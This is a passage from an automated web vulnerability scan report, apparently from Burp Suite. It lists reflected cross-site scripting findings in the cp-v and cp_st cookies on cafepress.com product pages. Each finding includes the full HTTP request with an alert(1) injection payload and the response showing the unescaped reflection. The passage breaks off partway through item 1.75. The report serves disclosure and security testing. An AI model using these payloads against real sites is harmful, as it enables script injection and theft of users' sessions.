The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35244"-alert(1)-"6a269d15e05 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 61013
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05 ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+water-bottles
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b6f</script><script>alert(1)</script>6386f2e7ab was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c2b6f</script><script>alert(1)</script>6386f2e7ab ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 61029
Date: Sun, 26 Dec 2010 13:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
= 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'c2b6f</script><script>alert(1)</script>6386f2e7ab '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-tank-tops
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec3ed"-alert(1)-"6cdf0b2af4a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 61745
Date: Sun, 26 Dec 2010 13:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAec3ed"-alert(1)-"6cdf0b2af4a ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-tank-tops
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae66d</script><script>alert(1)</script>eabb41eb2b2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+womens-tank-tops HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=ae66d</script><script>alert(1)</script>eabb41eb2b2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59702
Date: Sun, 26 Dec 2010 13:46:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:42 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
= 'cafepress.com';
window.cafepress.originCountryCode = 'US'
window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'ae66d</script><script>alert(1)</script>eabb41eb2b2 '
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-thongs
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d1e3"-alert(1)-"b1f51daa56d was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59312
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";
s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5d1e3"-alert(1)-"b1f51daa56d ";
s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
if (s.eVar26 == "") {
if ("" == "affiliate") {
s.eVar26 = "2099"; //2099 = affiliate
} el...[SNIP]...
1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+womens-thongs
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b983</script><script>alert(1)</script>ebe8ab7f2c6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+womens-thongs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=5b983</script><script>alert(1)</script>ebe8ab7f2c6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 